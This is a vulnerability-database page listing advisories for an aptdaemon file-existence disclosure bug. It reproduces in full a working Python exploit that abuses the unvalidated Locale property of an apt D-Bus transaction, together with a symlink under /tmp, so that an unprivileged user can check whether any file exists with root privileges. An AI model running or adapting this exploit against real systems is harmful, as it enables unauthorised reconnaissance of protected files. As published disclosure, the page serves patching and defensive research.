Vulners
Lucene search
aptdaemon < 1.1.1 - File Existence Disclosure
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | aptdaemon < 1.1.1 - File Existence Disclosure Exploit | 28 Oct 202000:00 | – | zdt |
 | Aptdaemon Local Security Bypass Vulnerability | 26 Jun 201500:00 | – | cnvd |
 | CVE-2015-1323 | 21 Jul 201714:00 | – | cve |
 | CVE-2015-1323 | 21 Jul 201714:00 | – | cvelist |
 | [SECURITY] [DLA 261-1] aptdaemon security update | 30 Jun 201510:12 | – | debian |
| [SECURITY] [DLA 261-2] aptdaemon regression update | 6 Jul 201508:40 | – | debian |
 | Debian DLA-261-2 : aptdaemon regression update | 1 Jul 201500:00 | – | nessus |
| Ubuntu 14.04 LTS : Aptdaemon vulnerability (USN-2648-1) | 17 Jun 201500:00 | – | nessus |
 | EUVD-2015-1464 | 7 Oct 202500:30 | – | euvd |
 | CVE-2015-1323 | 21 Jul 201714:29 | – | nvd |
10
# Exploit Title: File Existence Disclosure in aptdaemon <= 1.1.1+bzr982-0ubuntu32.1
# Date: 2020-10-27
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
# Vendor Homepage: https://wiki.debian.org/aptdaemon
# Software Link: https://wiki.debian.org/aptdaemon
# Version: <= 1.1.1+bzr982-0ubuntu32.1
# Tested on: Ubuntu 20.04
#
#!/usr/bin/env python3
#
# Ubuntu 16.04 - 20.04
# Debian 9 - 11
# aptdaemon < 1.1.1+bzr982-0ubuntu32.1
# Sensitive Information Disclosure
#
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
#
# There is no input validation on the Locale property in an
# apt transaction. An unprivileged user can supply a full path
# to a writable directory, which lets aptd read a file as root.
# Having a symlink in place results in an error message if the
# file exists, and no error otherwise. This way an unprivileged
# user can check for the existence of any files on the system
# as root.
#
# This is a similar type of bug as CVE-2015-1323.
#
#
# $ ./test_file_exists.py /root/.bashrc
# File Exists!
# $ ./test_file_exists.py /root/.bashrca
# File does not exist!
#
#
import dbus
import os
import sys
if len(sys.argv) != 2:
print("Checks if file exists")
print("Usage: %s <file>")
sys.exit(0)
FILE_TO_CHECK = sys.argv[1]
bus = dbus.SystemBus()
apt_dbus_object = bus.get_object("org.debian.apt", "/org/debian/apt")
apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.debian.apt")
# just use any valid .deb file
trans = apt_dbus_interface.InstallFile("/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb", False)
apt_trans_dbus_object = bus.get_object("org.debian.apt", trans)
apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.debian.apt.transaction")
properties_manager = dbus.Interface(apt_trans_dbus_interface, 'org.freedesktop.DBus.Properties')
os.mkdir("/tmp/a")
os.mkdir("/tmp/a/LC_MESSAGES")
os.symlink(FILE_TO_CHECK, "/tmp/a/LC_MESSAGES/aptdaemon.mo")
try:
properties_manager.Set("org.debian.apt.transaction", "Locale", "/tmp/a.")
except:
print("File Exists!")
pass
else:
print("File does not exist!")
os.unlink("/tmp/a/LC_MESSAGES/aptdaemon.mo")
os.rmdir("/tmp/a/LC_MESSAGES")
os.rmdir("/tmp/a")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Oct 2020 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 24.9
CVSS 35.5
EPSS0.00044